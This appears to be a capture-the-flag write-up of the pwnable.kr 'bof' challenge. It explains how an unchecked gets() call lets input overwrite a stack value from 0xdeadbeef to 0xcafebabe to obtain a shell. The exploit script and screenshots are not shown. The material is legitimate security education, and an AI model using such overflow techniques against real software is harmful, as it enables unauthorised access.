changed 2 years ago
Published Linked with GitHub

bof | pwnable challenge

Hello. This is a writeup for the bof challenge(binary exploitation) in pwnable site and can be found here
Let's go

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Solving The Challenge

The challenge has 2 files which we can download.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

We first run strings to see if anything is there. And we find nothing.
Since we are given the source code, we investigate it, to see what we can find.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

We see it uses a dangerous function gets which does not check for the buffer overflow. For more info, you can use man gets to see how it works.
we can see it gets overflowme which is 32 bytes long.
It prints overflowme which now it asks for user input.
We see if key == 0xcafebabe , then it will execute a shell , else if not it will print Nah..

We can also see the functions in cutter:
The main function

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

In the main function we see value in esp is set to 0xdeadbeef.
we notice another function that is func.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

We note that in esp of this function it calls gets as we previously saw in the source code.
continuing with the function, we see it moves value of eax to esp and then compares value of esp with 0xcafebabe. If the value is 0xcafebabe, then we should be able to execute a shell. In the main function we noticed that the value of esp was set to 0xdeadbeef.Hence we need to change the value of esp to 0xcafebabe.
let's try to execute the binary.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

We see by default it returns nah.
Let's use gdb to find the offset of the binary.
We see in the func function it lea(loads effective memory) of var_2ch to eax which is at ebp-0x2c and then it moves the value of eax to esp and then compares the esp value(which is initially set to 0xdeadbeef) to 0xcafebabe. So we need the 2 addresses for our exploit.
Now we can develop our exploit using pwntools:

when we run the exploit, we get an interactive shell.
so let's change it to the remote side.

Note: when running the remote side we comment the recvuntil so 
that it runs well and we get the flag.

On running the exploit:

We can now read the contents of the flag to get our flag.

That's it, The end of an exciting binary exploitation.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Select a repo